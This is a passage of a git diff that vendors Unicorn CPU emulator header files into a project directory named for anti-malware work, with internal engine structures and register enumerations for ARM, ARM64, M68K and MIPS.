ModuleEntry) ModuleTypeList; + +typedef uc_err (*query_t)(struct uc_struct *uc, uc_query_type type, size_t *result); + +// return 0 on success, -1 on failure +typedef int (*reg_read_t)(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +typedef int (*reg_write_t)(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +typedef void (*reg_reset_t)(struct uc_struct *uc); + +typedef bool (*uc_write_mem_t)(AddressSpace *as, hwaddr addr, const uint8_t *buf, int len); + +typedef bool (*uc_read_mem_t)(AddressSpace *as, hwaddr addr, uint8_t *buf, int len); + +typedef void (*uc_args_void_t)(void*); + +typedef void (*uc_args_uc_t)(struct uc_struct*); +typedef int (*uc_args_int_uc_t)(struct uc_struct*); + +typedef bool (*uc_args_tcg_enable_t)(struct uc_struct*); + +typedef void (*uc_args_uc_long_t)(struct uc_struct*, unsigned long); + +typedef void (*uc_args_uc_u64_t)(struct uc_struct *, uint64_t addr); + +typedef MemoryRegion* (*uc_args_uc_ram_size_t)(struct uc_struct*, hwaddr begin, size_t size, uint32_t perms); + +typedef MemoryRegion* (*uc_args_uc_ram_size_ptr_t)(struct uc_struct*, hwaddr begin, size_t size, uint32_t perms, void *ptr); + +typedef void (*uc_mem_unmap_t)(struct uc_struct*, MemoryRegion *mr); + +typedef void (*uc_readonly_mem_t)(MemoryRegion *mr, bool readonly); + +// which interrupt should make emulation stop? +typedef bool (*uc_args_int_t)(int intno); + +// some architecture redirect virtual memory to physical memory like Mips +typedef uint64_t (*uc_mem_redirect_t)(uint64_t address); + +// validate if Unicorn supports hooking a given instruction +typedef bool(*uc_insn_hook_validate)(uint32_t insn_enum); + +struct hook { + int type; // UC_HOOK_* + int insn; // instruction for HOOK_INSN + int refs; // reference count to free hook stored in multiple lists + bool to_delete; // set to true when the hook is deleted by the user. The destruction of the hook is delayed. 
+ uint64_t begin, end; // only trigger if PC or memory access is in this address (depends on hook type) + void *callback; // a uc_cb_* type + void *user_data; +}; + +// hook list offsets +// mirrors the order of uc_hook_type from include/unicorn/unicorn.h +enum uc_hook_idx { + UC_HOOK_INTR_IDX, + UC_HOOK_INSN_IDX, + UC_HOOK_CODE_IDX, + UC_HOOK_BLOCK_IDX, + UC_HOOK_MEM_READ_UNMAPPED_IDX, + UC_HOOK_MEM_WRITE_UNMAPPED_IDX, + UC_HOOK_MEM_FETCH_UNMAPPED_IDX, + UC_HOOK_MEM_READ_PROT_IDX, + UC_HOOK_MEM_WRITE_PROT_IDX, + UC_HOOK_MEM_FETCH_PROT_IDX, + UC_HOOK_MEM_READ_IDX, + UC_HOOK_MEM_WRITE_IDX, + UC_HOOK_MEM_FETCH_IDX, + UC_HOOK_MEM_READ_AFTER_IDX, + UC_HOOK_INSN_INVALID_IDX, + + UC_HOOK_MAX, +}; + +#define HOOK_FOREACH_VAR_DECLARE \ + struct list_item *cur + +// for loop macro to loop over hook lists +#define HOOK_FOREACH(uc, hh, idx) \ + for ( \ + cur = (uc)->hook[idx##_IDX].head; \ + cur != NULL && ((hh) = (struct hook *)cur->data); \ + cur = cur->next) + +// if statement to check hook bounds +#define HOOK_BOUND_CHECK(hh, addr) \ + ((((addr) >= (hh)->begin && (addr) <= (hh)->end) \ + || (hh)->begin > (hh)->end) && !((hh)->to_delete)) + +#define HOOK_EXISTS(uc, idx) ((uc)->hook[idx##_IDX].head != NULL) +#define HOOK_EXISTS_BOUNDED(uc, idx, addr) _hook_exists_bounded((uc)->hook[idx##_IDX].head, addr) + +static inline bool _hook_exists_bounded(struct list_item *cur, uint64_t addr) +{ + while (cur != NULL) { + if (HOOK_BOUND_CHECK((struct hook *)cur->data, addr)) + return true; + cur = cur->next; + } + return false; +} + +//relloc increment, KEEP THIS A POWER OF 2! 
+#define MEM_BLOCK_INCR 32 + +struct uc_struct { + uc_arch arch; + uc_mode mode; + uc_err errnum; // qemu/cpu-exec.c + AddressSpace as; + query_t query; + reg_read_t reg_read; + reg_write_t reg_write; + reg_reset_t reg_reset; + + uc_write_mem_t write_mem; + uc_read_mem_t read_mem; + uc_args_void_t release; // release resource when uc_close() + uc_args_uc_u64_t set_pc; // set PC for tracecode + uc_args_int_t stop_interrupt; // check if the interrupt should stop emulation + + uc_args_uc_t init_arch, cpu_exec_init_all; + uc_args_int_uc_t vm_start; + uc_args_tcg_enable_t tcg_enabled; + uc_args_uc_long_t tcg_exec_init; + uc_args_uc_ram_size_t memory_map; + uc_args_uc_ram_size_ptr_t memory_map_ptr; + uc_mem_unmap_t memory_unmap; + uc_readonly_mem_t readonly_mem; + uc_mem_redirect_t mem_redirect; + // TODO: remove current_cpu, as it's a flag for something else ("cpu running"?) + CPUState *cpu, *current_cpu; + + uc_insn_hook_validate insn_hook_validate; + + MemoryRegion *system_memory; // qemu/exec.c + MemoryRegion io_mem_rom; // qemu/exec.c + MemoryRegion io_mem_notdirty; // qemu/exec.c + MemoryRegion io_mem_unassigned; // qemu/exec.c + MemoryRegion io_mem_watch; // qemu/exec.c + RAMList ram_list; // qemu/exec.c + BounceBuffer bounce; // qemu/cpu-exec.c + volatile sig_atomic_t exit_request; // qemu/cpu-exec.c + bool global_dirty_log; // qemu/memory.c + /* This is a multi-level map on the virtual address space. + The bottom level has pointers to PageDesc. 
*/ + void **l1_map; // qemu/translate-all.c + size_t l1_map_size; + /* code generation context */ + void *tcg_ctx; // for "TCGContext tcg_ctx" in qemu/translate-all.c + /* memory.c */ + unsigned memory_region_transaction_depth; + bool memory_region_update_pending; + bool ioeventfd_update_pending; + QTAILQ_HEAD(memory_listeners, MemoryListener) memory_listeners; + QTAILQ_HEAD(, AddressSpace) address_spaces; + MachineState *machine_state; + // qom/object.c + GHashTable *type_table; + Type type_interface; + Object *root; + Object *owner; + bool enumerating_types; + // util/module.c + ModuleTypeList init_type_list[MODULE_INIT_MAX]; + // hw/intc/apic_common.c + DeviceState *vapic; + int apic_no; + bool mmio_registered; + bool apic_report_tpr_access; + + // linked lists containing hooks per type + struct list hook[UC_HOOK_MAX]; + struct list hooks_to_del; + + // hook to count number of instructions for uc_emu_start() + uc_hook count_hook; + + size_t emu_counter; // current counter of uc_emu_start() + size_t emu_count; // save counter of uc_emu_start() + + uint64_t block_addr; // save the last block address we hooked + + int size_recur_mem; // size for mem access when in a recursive call + + bool init_tcg; // already initialized local TCGv variables? 
+ bool stop_request; // request to immediately stop emulation - for uc_emu_stop() + bool quit_request; // request to quit the current TB, but continue to emulate - for uc_mem_protect() + bool emulation_done; // emulation is done by uc_emu_start() + bool timed_out; // emulation timed out, that can retrieve via uc_query(UC_QUERY_TIMEOUT) + QemuThread timer; // timer for emulation timeout + uint64_t timeout; // timeout for uc_emu_start() + + uint64_t invalid_addr; // invalid address to be accessed + int invalid_error; // invalid memory code: 1 = READ, 2 = WRITE, 3 = CODE + + uint64_t addr_end; // address where emulation stops (@end param of uc_emu_start()) + + int thumb; // thumb mode for ARM + // full TCG cache leads to middle-block break in the last translation? + bool block_full; + int size_arg; // what tcg arg slot do we need to update with the size of the block? + MemoryRegion **mapped_blocks; + uint32_t mapped_block_count; + uint32_t mapped_block_cache_index; + void *qemu_thread_data; // to support cross compile to Windows (qemu-thread-win32.c) + uint32_t target_page_size; + uint32_t target_page_align; + uint64_t next_pc; // save next PC for some special cases + bool hook_insert; // insert new hook at begin of the hook list (append by default) + struct list saved_contexts; // The contexts saved by this uc_struct. 
+}; + +// Metadata stub for the variable-size cpu context used with uc_context_*() +// We also save cpu->jmp_env, so emulation can be reentrant +struct uc_context { + size_t context_size; // size of the real internal context structure + size_t jmp_env_size; // size of cpu->jmp_env + struct uc_struct* uc; // the uc_struct which creates this context + char data[0]; // context + cpu->jmp_env +}; + +// check if this address is mapped in (via uc_mem_map()) +MemoryRegion *memory_mapping(struct uc_struct* uc, uint64_t address); + +#endif +/* vim: set ts=4 noet: */ diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm.h new file mode 100644 index 0000000..a0fd83e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm.h @@ -0,0 +1,157 @@ +/* Unicorn Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ARM_H +#define UNICORN_ARM_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> ARM registers +typedef enum uc_arm_reg { + UC_ARM_REG_INVALID = 0, + UC_ARM_REG_APSR, + UC_ARM_REG_APSR_NZCV, + UC_ARM_REG_CPSR, + UC_ARM_REG_FPEXC, + UC_ARM_REG_FPINST, + UC_ARM_REG_FPSCR, + UC_ARM_REG_FPSCR_NZCV, + UC_ARM_REG_FPSID, + UC_ARM_REG_ITSTATE, + UC_ARM_REG_LR, + UC_ARM_REG_PC, + UC_ARM_REG_SP, + UC_ARM_REG_SPSR, + UC_ARM_REG_D0, + UC_ARM_REG_D1, + UC_ARM_REG_D2, + UC_ARM_REG_D3, + UC_ARM_REG_D4, + UC_ARM_REG_D5, + UC_ARM_REG_D6, + UC_ARM_REG_D7, + UC_ARM_REG_D8, + UC_ARM_REG_D9, + UC_ARM_REG_D10, + UC_ARM_REG_D11, + UC_ARM_REG_D12, + UC_ARM_REG_D13, + UC_ARM_REG_D14, + UC_ARM_REG_D15, + UC_ARM_REG_D16, + UC_ARM_REG_D17, + UC_ARM_REG_D18, + UC_ARM_REG_D19, + UC_ARM_REG_D20, + UC_ARM_REG_D21, + UC_ARM_REG_D22, + UC_ARM_REG_D23, + UC_ARM_REG_D24, + UC_ARM_REG_D25, + UC_ARM_REG_D26, + UC_ARM_REG_D27, 
+ UC_ARM_REG_D28, + UC_ARM_REG_D29, + UC_ARM_REG_D30, + UC_ARM_REG_D31, + UC_ARM_REG_FPINST2, + UC_ARM_REG_MVFR0, + UC_ARM_REG_MVFR1, + UC_ARM_REG_MVFR2, + UC_ARM_REG_Q0, + UC_ARM_REG_Q1, + UC_ARM_REG_Q2, + UC_ARM_REG_Q3, + UC_ARM_REG_Q4, + UC_ARM_REG_Q5, + UC_ARM_REG_Q6, + UC_ARM_REG_Q7, + UC_ARM_REG_Q8, + UC_ARM_REG_Q9, + UC_ARM_REG_Q10, + UC_ARM_REG_Q11, + UC_ARM_REG_Q12, + UC_ARM_REG_Q13, + UC_ARM_REG_Q14, + UC_ARM_REG_Q15, + UC_ARM_REG_R0, + UC_ARM_REG_R1, + UC_ARM_REG_R2, + UC_ARM_REG_R3, + UC_ARM_REG_R4, + UC_ARM_REG_R5, + UC_ARM_REG_R6, + UC_ARM_REG_R7, + UC_ARM_REG_R8, + UC_ARM_REG_R9, + UC_ARM_REG_R10, + UC_ARM_REG_R11, + UC_ARM_REG_R12, + UC_ARM_REG_S0, + UC_ARM_REG_S1, + UC_ARM_REG_S2, + UC_ARM_REG_S3, + UC_ARM_REG_S4, + UC_ARM_REG_S5, + UC_ARM_REG_S6, + UC_ARM_REG_S7, + UC_ARM_REG_S8, + UC_ARM_REG_S9, + UC_ARM_REG_S10, + UC_ARM_REG_S11, + UC_ARM_REG_S12, + UC_ARM_REG_S13, + UC_ARM_REG_S14, + UC_ARM_REG_S15, + UC_ARM_REG_S16, + UC_ARM_REG_S17, + UC_ARM_REG_S18, + UC_ARM_REG_S19, + UC_ARM_REG_S20, + UC_ARM_REG_S21, + UC_ARM_REG_S22, + UC_ARM_REG_S23, + UC_ARM_REG_S24, + UC_ARM_REG_S25, + UC_ARM_REG_S26, + UC_ARM_REG_S27, + UC_ARM_REG_S28, + UC_ARM_REG_S29, + UC_ARM_REG_S30, + UC_ARM_REG_S31, + + UC_ARM_REG_C1_C0_2, + UC_ARM_REG_C13_C0_2, + UC_ARM_REG_C13_C0_3, + + UC_ARM_REG_IPSR, + UC_ARM_REG_MSP, + UC_ARM_REG_PSP, + UC_ARM_REG_CONTROL, + UC_ARM_REG_ENDING, // <-- mark the end of the list or registers + + //> alias registers + UC_ARM_REG_R13 = UC_ARM_REG_SP, + UC_ARM_REG_R14 = UC_ARM_REG_LR, + UC_ARM_REG_R15 = UC_ARM_REG_PC, + + UC_ARM_REG_SB = UC_ARM_REG_R9, + UC_ARM_REG_SL = UC_ARM_REG_R10, + UC_ARM_REG_FP = UC_ARM_REG_R11, + UC_ARM_REG_IP = UC_ARM_REG_R12, +} uc_arm_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm64.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm64.h new file mode 100644 index 0000000..0f66518 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm64.h @@ -0,0 +1,344 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ARM64_H +#define UNICORN_ARM64_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> ARM64 registers +typedef enum uc_arm64_reg { + UC_ARM64_REG_INVALID = 0, + + UC_ARM64_REG_X29, + UC_ARM64_REG_X30, + UC_ARM64_REG_NZCV, + UC_ARM64_REG_SP, + UC_ARM64_REG_WSP, + UC_ARM64_REG_WZR, + UC_ARM64_REG_XZR, + UC_ARM64_REG_B0, + UC_ARM64_REG_B1, + UC_ARM64_REG_B2, + UC_ARM64_REG_B3, + UC_ARM64_REG_B4, + UC_ARM64_REG_B5, + UC_ARM64_REG_B6, + UC_ARM64_REG_B7, + UC_ARM64_REG_B8, + UC_ARM64_REG_B9, + UC_ARM64_REG_B10, + UC_ARM64_REG_B11, + UC_ARM64_REG_B12, + UC_ARM64_REG_B13, + UC_ARM64_REG_B14, + UC_ARM64_REG_B15, + UC_ARM64_REG_B16, + UC_ARM64_REG_B17, + UC_ARM64_REG_B18, + UC_ARM64_REG_B19, + UC_ARM64_REG_B20, + UC_ARM64_REG_B21, + UC_ARM64_REG_B22, + UC_ARM64_REG_B23, + UC_ARM64_REG_B24, + UC_ARM64_REG_B25, + UC_ARM64_REG_B26, + UC_ARM64_REG_B27, + UC_ARM64_REG_B28, + UC_ARM64_REG_B29, + UC_ARM64_REG_B30, + UC_ARM64_REG_B31, + UC_ARM64_REG_D0, + UC_ARM64_REG_D1, + UC_ARM64_REG_D2, + UC_ARM64_REG_D3, + UC_ARM64_REG_D4, + UC_ARM64_REG_D5, + UC_ARM64_REG_D6, + UC_ARM64_REG_D7, + UC_ARM64_REG_D8, + UC_ARM64_REG_D9, + UC_ARM64_REG_D10, + UC_ARM64_REG_D11, + UC_ARM64_REG_D12, + UC_ARM64_REG_D13, + UC_ARM64_REG_D14, + UC_ARM64_REG_D15, + UC_ARM64_REG_D16, + UC_ARM64_REG_D17, + UC_ARM64_REG_D18, + UC_ARM64_REG_D19, + UC_ARM64_REG_D20, + UC_ARM64_REG_D21, + UC_ARM64_REG_D22, + UC_ARM64_REG_D23, + UC_ARM64_REG_D24, + UC_ARM64_REG_D25, + UC_ARM64_REG_D26, + UC_ARM64_REG_D27, + UC_ARM64_REG_D28, + UC_ARM64_REG_D29, + UC_ARM64_REG_D30, + UC_ARM64_REG_D31, + UC_ARM64_REG_H0, + UC_ARM64_REG_H1, + UC_ARM64_REG_H2, + UC_ARM64_REG_H3, + UC_ARM64_REG_H4, 
+ UC_ARM64_REG_H5, + UC_ARM64_REG_H6, + UC_ARM64_REG_H7, + UC_ARM64_REG_H8, + UC_ARM64_REG_H9, + UC_ARM64_REG_H10, + UC_ARM64_REG_H11, + UC_ARM64_REG_H12, + UC_ARM64_REG_H13, + UC_ARM64_REG_H14, + UC_ARM64_REG_H15, + UC_ARM64_REG_H16, + UC_ARM64_REG_H17, + UC_ARM64_REG_H18, + UC_ARM64_REG_H19, + UC_ARM64_REG_H20, + UC_ARM64_REG_H21, + UC_ARM64_REG_H22, + UC_ARM64_REG_H23, + UC_ARM64_REG_H24, + UC_ARM64_REG_H25, + UC_ARM64_REG_H26, + UC_ARM64_REG_H27, + UC_ARM64_REG_H28, + UC_ARM64_REG_H29, + UC_ARM64_REG_H30, + UC_ARM64_REG_H31, + UC_ARM64_REG_Q0, + UC_ARM64_REG_Q1, + UC_ARM64_REG_Q2, + UC_ARM64_REG_Q3, + UC_ARM64_REG_Q4, + UC_ARM64_REG_Q5, + UC_ARM64_REG_Q6, + UC_ARM64_REG_Q7, + UC_ARM64_REG_Q8, + UC_ARM64_REG_Q9, + UC_ARM64_REG_Q10, + UC_ARM64_REG_Q11, + UC_ARM64_REG_Q12, + UC_ARM64_REG_Q13, + UC_ARM64_REG_Q14, + UC_ARM64_REG_Q15, + UC_ARM64_REG_Q16, + UC_ARM64_REG_Q17, + UC_ARM64_REG_Q18, + UC_ARM64_REG_Q19, + UC_ARM64_REG_Q20, + UC_ARM64_REG_Q21, + UC_ARM64_REG_Q22, + UC_ARM64_REG_Q23, + UC_ARM64_REG_Q24, + UC_ARM64_REG_Q25, + UC_ARM64_REG_Q26, + UC_ARM64_REG_Q27, + UC_ARM64_REG_Q28, + UC_ARM64_REG_Q29, + UC_ARM64_REG_Q30, + UC_ARM64_REG_Q31, + UC_ARM64_REG_S0, + UC_ARM64_REG_S1, + UC_ARM64_REG_S2, + UC_ARM64_REG_S3, + UC_ARM64_REG_S4, + UC_ARM64_REG_S5, + UC_ARM64_REG_S6, + UC_ARM64_REG_S7, + UC_ARM64_REG_S8, + UC_ARM64_REG_S9, + UC_ARM64_REG_S10, + UC_ARM64_REG_S11, + UC_ARM64_REG_S12, + UC_ARM64_REG_S13, + UC_ARM64_REG_S14, + UC_ARM64_REG_S15, + UC_ARM64_REG_S16, + UC_ARM64_REG_S17, + UC_ARM64_REG_S18, + UC_ARM64_REG_S19, + UC_ARM64_REG_S20, + UC_ARM64_REG_S21, + UC_ARM64_REG_S22, + UC_ARM64_REG_S23, + UC_ARM64_REG_S24, + UC_ARM64_REG_S25, + UC_ARM64_REG_S26, + UC_ARM64_REG_S27, + UC_ARM64_REG_S28, + UC_ARM64_REG_S29, + UC_ARM64_REG_S30, + UC_ARM64_REG_S31, + UC_ARM64_REG_W0, + UC_ARM64_REG_W1, + UC_ARM64_REG_W2, + UC_ARM64_REG_W3, + UC_ARM64_REG_W4, + UC_ARM64_REG_W5, + UC_ARM64_REG_W6, + UC_ARM64_REG_W7, + UC_ARM64_REG_W8, + UC_ARM64_REG_W9, + 
UC_ARM64_REG_W10, + UC_ARM64_REG_W11, + UC_ARM64_REG_W12, + UC_ARM64_REG_W13, + UC_ARM64_REG_W14, + UC_ARM64_REG_W15, + UC_ARM64_REG_W16, + UC_ARM64_REG_W17, + UC_ARM64_REG_W18, + UC_ARM64_REG_W19, + UC_ARM64_REG_W20, + UC_ARM64_REG_W21, + UC_ARM64_REG_W22, + UC_ARM64_REG_W23, + UC_ARM64_REG_W24, + UC_ARM64_REG_W25, + UC_ARM64_REG_W26, + UC_ARM64_REG_W27, + UC_ARM64_REG_W28, + UC_ARM64_REG_W29, + UC_ARM64_REG_W30, + UC_ARM64_REG_X0, + UC_ARM64_REG_X1, + UC_ARM64_REG_X2, + UC_ARM64_REG_X3, + UC_ARM64_REG_X4, + UC_ARM64_REG_X5, + UC_ARM64_REG_X6, + UC_ARM64_REG_X7, + UC_ARM64_REG_X8, + UC_ARM64_REG_X9, + UC_ARM64_REG_X10, + UC_ARM64_REG_X11, + UC_ARM64_REG_X12, + UC_ARM64_REG_X13, + UC_ARM64_REG_X14, + UC_ARM64_REG_X15, + UC_ARM64_REG_X16, + UC_ARM64_REG_X17, + UC_ARM64_REG_X18, + UC_ARM64_REG_X19, + UC_ARM64_REG_X20, + UC_ARM64_REG_X21, + UC_ARM64_REG_X22, + UC_ARM64_REG_X23, + UC_ARM64_REG_X24, + UC_ARM64_REG_X25, + UC_ARM64_REG_X26, + UC_ARM64_REG_X27, + UC_ARM64_REG_X28, + + UC_ARM64_REG_V0, + UC_ARM64_REG_V1, + UC_ARM64_REG_V2, + UC_ARM64_REG_V3, + UC_ARM64_REG_V4, + UC_ARM64_REG_V5, + UC_ARM64_REG_V6, + UC_ARM64_REG_V7, + UC_ARM64_REG_V8, + UC_ARM64_REG_V9, + UC_ARM64_REG_V10, + UC_ARM64_REG_V11, + UC_ARM64_REG_V12, + UC_ARM64_REG_V13, + UC_ARM64_REG_V14, + UC_ARM64_REG_V15, + UC_ARM64_REG_V16, + UC_ARM64_REG_V17, + UC_ARM64_REG_V18, + UC_ARM64_REG_V19, + UC_ARM64_REG_V20, + UC_ARM64_REG_V21, + UC_ARM64_REG_V22, + UC_ARM64_REG_V23, + UC_ARM64_REG_V24, + UC_ARM64_REG_V25, + UC_ARM64_REG_V26, + UC_ARM64_REG_V27, + UC_ARM64_REG_V28, + UC_ARM64_REG_V29, + UC_ARM64_REG_V30, + UC_ARM64_REG_V31, + + //> pseudo registers + UC_ARM64_REG_PC, // program counter register + + UC_ARM64_REG_CPACR_EL1, + + //> thread registers + UC_ARM64_REG_TPIDR_EL0, + UC_ARM64_REG_TPIDRRO_EL0, + UC_ARM64_REG_TPIDR_EL1, + + UC_ARM64_REG_PSTATE, + + //> exception link registers + UC_ARM64_REG_ELR_EL0, + UC_ARM64_REG_ELR_EL1, + UC_ARM64_REG_ELR_EL2, + UC_ARM64_REG_ELR_EL3, + + //> stack 
pointers registers + UC_ARM64_REG_SP_EL0, + UC_ARM64_REG_SP_EL1, + UC_ARM64_REG_SP_EL2, + UC_ARM64_REG_SP_EL3, + + //> other CP15 registers + UC_ARM64_REG_TTBR0_EL1, + UC_ARM64_REG_TTBR1_EL1, + + UC_ARM64_REG_ESR_EL0, + UC_ARM64_REG_ESR_EL1, + UC_ARM64_REG_ESR_EL2, + UC_ARM64_REG_ESR_EL3, + + UC_ARM64_REG_FAR_EL0, + UC_ARM64_REG_FAR_EL1, + UC_ARM64_REG_FAR_EL2, + UC_ARM64_REG_FAR_EL3, + + UC_ARM64_REG_PAR_EL1, + + UC_ARM64_REG_MAIR_EL1, + + UC_ARM64_REG_VBAR_EL0, + UC_ARM64_REG_VBAR_EL1, + UC_ARM64_REG_VBAR_EL2, + UC_ARM64_REG_VBAR_EL3, + + UC_ARM64_REG_ENDING, // <-- mark the end of the list of registers + + //> alias registers + + UC_ARM64_REG_IP0 = UC_ARM64_REG_X16, + UC_ARM64_REG_IP1 = UC_ARM64_REG_X17, + UC_ARM64_REG_FP = UC_ARM64_REG_X29, + UC_ARM64_REG_LR = UC_ARM64_REG_X30, +} uc_arm64_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/m68k.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/m68k.h new file mode 100644 index 0000000..80e8b92 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/m68k.h @@ -0,0 +1,50 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2014-2017 */ +/* This file is released under LGPL2. 
+ See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_M68K_H +#define UNICORN_M68K_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> M68K registers +typedef enum uc_m68k_reg { + UC_M68K_REG_INVALID = 0, + + UC_M68K_REG_A0, + UC_M68K_REG_A1, + UC_M68K_REG_A2, + UC_M68K_REG_A3, + UC_M68K_REG_A4, + UC_M68K_REG_A5, + UC_M68K_REG_A6, + UC_M68K_REG_A7, + + UC_M68K_REG_D0, + UC_M68K_REG_D1, + UC_M68K_REG_D2, + UC_M68K_REG_D3, + UC_M68K_REG_D4, + UC_M68K_REG_D5, + UC_M68K_REG_D6, + UC_M68K_REG_D7, + + UC_M68K_REG_SR, + UC_M68K_REG_PC, + + UC_M68K_REG_ENDING, // <-- mark the end of the list of registers +} uc_m68k_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/mips.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/mips.h new file mode 100644 index 0000000..77fde3c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/mips.h @@ -0,0 +1,232 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ +/* This file is released under LGPL2. 
+ See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_MIPS_H +#define UNICORN_MIPS_H + +#ifdef __cplusplus +extern "C" { +#endif + +// GCC MIPS toolchain has a default macro called "mips" which breaks +// compilation +#undef mips + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> MIPS registers +typedef enum UC_MIPS_REG { + UC_MIPS_REG_INVALID = 0, + //> General purpose registers + UC_MIPS_REG_PC, + + UC_MIPS_REG_0, + UC_MIPS_REG_1, + UC_MIPS_REG_2, + UC_MIPS_REG_3, + UC_MIPS_REG_4, + UC_MIPS_REG_5, + UC_MIPS_REG_6, + UC_MIPS_REG_7, + UC_MIPS_REG_8, + UC_MIPS_REG_9, + UC_MIPS_REG_10, + UC_MIPS_REG_11, + UC_MIPS_REG_12, + UC_MIPS_REG_13, + UC_MIPS_REG_14, + UC_MIPS_REG_15, + UC_MIPS_REG_16, + UC_MIPS_REG_17, + UC_MIPS_REG_18, + UC_MIPS_REG_19, + UC_MIPS_REG_20, + UC_MIPS_REG_21, + UC_MIPS_REG_22, + UC_MIPS_REG_23, + UC_MIPS_REG_24, + UC_MIPS_REG_25, + UC_MIPS_REG_26, + UC_MIPS_REG_27, + UC_MIPS_REG_28, + UC_MIPS_REG_29, + UC_MIPS_REG_30, + UC_MIPS_REG_31, + + //> DSP registers + UC_MIPS_REG_DSPCCOND, + UC_MIPS_REG_DSPCARRY, + UC_MIPS_REG_DSPEFI, + UC_MIPS_REG_DSPOUTFLAG, + UC_MIPS_REG_DSPOUTFLAG16_19, + UC_MIPS_REG_DSPOUTFLAG20, + UC_MIPS_REG_DSPOUTFLAG21, + UC_MIPS_REG_DSPOUTFLAG22, + UC_MIPS_REG_DSPOUTFLAG23, + UC_MIPS_REG_DSPPOS, + UC_MIPS_REG_DSPSCOUNT, + + //> ACC registers + UC_MIPS_REG_AC0, + UC_MIPS_REG_AC1, + UC_MIPS_REG_AC2, + UC_MIPS_REG_AC3, + + //> COP registers + UC_MIPS_REG_CC0, + UC_MIPS_REG_CC1, + UC_MIPS_REG_CC2, + UC_MIPS_REG_CC3, + UC_MIPS_REG_CC4, + UC_MIPS_REG_CC5, + UC_MIPS_REG_CC6, + UC_MIPS_REG_CC7, + + //> FPU registers + UC_MIPS_REG_F0, + UC_MIPS_REG_F1, + UC_MIPS_REG_F2, + UC_MIPS_REG_F3, + UC_MIPS_REG_F4, + UC_MIPS_REG_F5, + UC_MIPS_REG_F6, + UC_MIPS_REG_F7, + UC_MIPS_REG_F8, + UC_MIPS_REG_F9, + UC_MIPS_REG_F10, + UC_MIPS_REG_F11, + UC_MIPS_REG_F12, + UC_MIPS_REG_F13, + UC_MIPS_REG_F14, + UC_MIPS_REG_F15, + UC_MIPS_REG_F16, + UC_MIPS_REG_F17, + UC_MIPS_REG_F18, + UC_MIPS_REG_F19, + UC_MIPS_REG_F20, + 
UC_MIPS_REG_ENDING, // <-- mark the end of the list of registers
UC_MIPS_REG_20, + UC_MIPS_REG_S5 = UC_MIPS_REG_21, + UC_MIPS_REG_S6 = UC_MIPS_REG_22, + UC_MIPS_REG_S7 = UC_MIPS_REG_23, + UC_MIPS_REG_T8 = UC_MIPS_REG_24, + UC_MIPS_REG_T9 = UC_MIPS_REG_25, + UC_MIPS_REG_K0 = UC_MIPS_REG_26, + UC_MIPS_REG_K1 = UC_MIPS_REG_27, + UC_MIPS_REG_GP = UC_MIPS_REG_28, + UC_MIPS_REG_SP = UC_MIPS_REG_29, + UC_MIPS_REG_FP = UC_MIPS_REG_30, UC_MIPS_REG_S8 = UC_MIPS_REG_30, + UC_MIPS_REG_RA = UC_MIPS_REG_31, + + UC_MIPS_REG_HI0 = UC_MIPS_REG_AC0, + UC_MIPS_REG_HI1 = UC_MIPS_REG_AC1, + UC_MIPS_REG_HI2 = UC_MIPS_REG_AC2, + UC_MIPS_REG_HI3 = UC_MIPS_REG_AC3, + + UC_MIPS_REG_LO0 = UC_MIPS_REG_HI0, + UC_MIPS_REG_LO1 = UC_MIPS_REG_HI1, + UC_MIPS_REG_LO2 = UC_MIPS_REG_HI2, + UC_MIPS_REG_LO3 = UC_MIPS_REG_HI3, +} UC_MIPS_REG; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/platform.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/platform.h new file mode 100644 index 0000000..5bbfd8a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/platform.h @@ -0,0 +1,221 @@ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +/* + This file is to support header files that are missing in MSVC and + other non-standard compilers. 
